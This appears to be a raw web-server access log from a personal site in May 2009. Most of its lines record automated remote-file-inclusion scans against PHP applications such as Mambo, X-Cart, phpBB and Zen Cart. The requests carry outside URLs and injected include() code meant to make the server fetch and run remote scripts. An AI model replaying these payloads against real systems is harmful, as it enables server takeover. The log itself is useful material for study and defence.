89.234.63.110 - - [22/May/2009:10:47:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.187.131.185 - - [22/May/2009:10:47:52 -0700] "GET /?p=http://www.cdl-df.com.br/liquida/fotos/id.txt??? HTTP/1.1" 200 42061 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.128.40 - - [22/May/2009:10:48:05 -0700] "GET /logs/access_080302.log//site/index.php?option=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.1.149.222 - - [22/May/2009:10:48:35 -0700] "GET /logs/access_080531.log/errors.php?error=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:49:25 -0700] "GET /logs/access_080422.log%20//admin/auth.php?xcart_dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:49:26 -0700] "GET /logs/access_080104.log%20//admin/auth.php?xcart_dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:49:45 -0700] "GET /logs/access_081201.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:49:46 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:49:51 -0700] "GET /logs/access_081201.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:49:52 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:49:55 -0700] "GET /logs/access_090117.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:50:00 -0700] "GET /logs/access_090117.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:50:01 -0700] "GET /logs/access_081201.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:50:01 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:50:02 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:50:06 -0700] "GET /logs/access_081201.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:50:06 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:50:10 -0700] "GET /logs/access_090117.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:50:11 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:50:17 -0700] "GET /admin/auth.php?xcart_dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:50:25 -0700] "GET /logs/access_090117.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
116.50.163.164 - - [22/May/2009:10:50:27 -0700] "GET /logs/access_080104.log%20//admin/auth.php?xcart_dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.12.149.149 - - [22/May/2009:10:50:39 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.12.149.149 - - [22/May/2009:10:50:39 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.12.149.149 - - [22/May/2009:10:50:39 -0700] "GET /logs/access_090119.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.70.151 - - [22/May/2009:10:51:05 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/thumbs/thumbs_001.jpg HTTP/1.1" 200 60995 "-" "Googlebot-Image/1.0" "dmulk.com"
222.239.227.229 - - [22/May/2009:10:51:15 -0700] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.12.149.149 - - [22/May/2009:10:51:25 -0700] "GET /logs/access_080609.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:51:44 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:52:00 -0700] "GET /logs/access_080715.log/lang.php?subp=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:52:03 -0700] "GET /lang.php?subp=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:52:03 -0700] "GET /logs/lang.php?subp=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
85.125.233.222 - - [22/May/2009:10:52:03 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:52:07 -0700] "GET /logs/access_080715.log/lang.php?subp=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:52:07 -0700] "GET /lang.php?subp=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:52:07 -0700] "GET /logs/lang.php?subp=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:10:52:18 -0700] "GET /logs/access_080614.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:10:52:19 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:10:52:20 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:53:08 -0700] "GET /logs/access_080716.log/lang.php?subp=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:53:26 -0700] "GET /logs/access_080716.log/lang.php?subp=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:53:31 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:53:31 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:53:31 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:53:31 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [22/May/2009:10:53:56 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [22/May/2009:10:53:57 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [22/May/2009:10:53:57 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:53:59 -0700] "GET /logs/access_090206.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:53:59 -0700] "GET /logs/access_090206.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:54:01 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:54:01 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:54:03 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:54:04 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:54:06 -0700] "GET /logs/access_090206.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:54:13 -0700] "GET /logs/access_090117.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [22/May/2009:10:54:13 -0700] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [22/May/2009:10:54:18 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [22/May/2009:10:54:19 -0700] "GET /logs/access_080517.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:54:19 -0700] "GET /logs/access_090117.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [22/May/2009:10:54:21 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
91.206.183.148 - - [22/May/2009:10:54:23 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:54:28 -0700] "GET /logs/access_090206.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:54:32 -0700] "GET /logs/access_090117.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [22/May/2009:10:54:39 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
67.43.0.140 - - [22/May/2009:10:54:41 -0700] "GET /logs/access_080216.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [22/May/2009:10:54:41 -0700] "GET /logs/access_080517.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:10:54:45 -0700] "GET /logs/access_081116.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:54:58 -0700] "GET /logs/access_090117.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [22/May/2009:10:55:00 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
85.237.201.58 - - [22/May/2009:10:55:01 -0700] "GET /logs/access_080403.log/?mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.237.201.58 - - [22/May/2009:10:55:10 -0700] "GET /logs/?mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 200 100620 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:10:55:17 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:55:19 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:55:19 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:55:19 -0700] "GET /logs/access_090501.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:10:55:38 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
91.206.183.148 - - [22/May/2009:10:55:43 -0700] "GET /logs/access_080412.log%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [22/May/2009:10:55:43 -0700] "GET /logs/access_080513.log%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [22/May/2009:10:55:46 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [22/May/2009:10:55:46 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [22/May/2009:10:55:46 -0700] "GET /logs/access_080611.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [22/May/2009:10:55:47 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
211.147.212.11 - - [22/May/2009:10:55:51 -0700] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.191.102.117 - - [22/May/2009:10:55:54 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.challenger.com.co/colombia//components/com_virtuemart/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [22/May/2009:10:55:54 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.challenger.com.co/colombia//components/com_virtuemart/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [22/May/2009:10:55:54 -0700] "GET /logs/access_080922.log/encapscms_PATH/core/core.php?root=http://www.challenger.com.co/colombia//components/com_virtuemart/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.147.212.11 - - [22/May/2009:10:55:56 -0700] "GET /phphtml.php?htmlclass_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.191.102.117 - - [22/May/2009:10:55:58 -0700] "GET /logs/access_080426.log%20%20/encapscms_PATH/core/core.php?root=http://www.challenger.com.co/colombia//components/com_virtuemart/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [22/May/2009:10:55:58 -0700] "GET /logs/access_080522.log%20%20/encapscms_PATH/core/core.php?root=http://www.challenger.com.co/colombia//components/com_virtuemart/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [22/May/2009:10:56:00 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 200 7988 "-" "Mozilla/5.0" "www.dmulk.com"
85.237.201.58 - - [22/May/2009:10:56:01 -0700] "GET /?mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 500 292 "-" "libwww-perl/5.803" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:56:02 -0700] "GET /logs/access_080412.log%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.147.212.11 - - [22/May/2009:10:56:04 -0700] "GET /logs/access_080809.log/errors.php?error=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.237.82.158 - - [22/May/2009:10:56:06 -0700] "GET /logs/access_080513.log%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:10:56:09 -0700] "GET /logs/access_080924.log/classes/core/language.php?rootdir=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.147.212.11 - - [22/May/2009:10:56:10 -0700] "GET /errors.php?error=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.237.201.58 - - [22/May/2009:10:56:21 -0700] "GET /logs/access_090318.log//shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.237.201.58 - - [22/May/2009:10:56:22 -0700] "GET /shop/main.php?_shop_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:10:56:35 -0700] "GET /logs/access_080817.log/popup.php?path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:10:56:36 -0700] "GET /popup.php?path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:10:56:37 -0700] "GET /logs/popup.php?path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:56:43 -0700] "GET /logs/access_080513.log%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:56:43 -0700] "GET /logs/access_080412.log%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.102 - - [22/May/2009:10:56:45 -0700] "GET /logs/access_080611.log//errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.102 - - [22/May/2009:10:56:45 -0700] "GET /errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.102 - - [22/May/2009:10:56:45 -0700] "GET /logs/access_080419.log//errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.102 - - [22/May/2009:10:56:46 -0700] "GET /logs//errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.59.148.76 - - [22/May/2009:10:56:54 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.casualife.ru/Top.txt? HTTP/1.1" 200 100625 "-" "libwww-perl/5.69" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:56:56 -0700] "GET /logs/access_090512.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [22/May/2009:10:56:59 -0700] "GET /logs/access_080611.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [22/May/2009:10:56:59 -0700] "GET /logs/access_080419.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:10:57:08 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
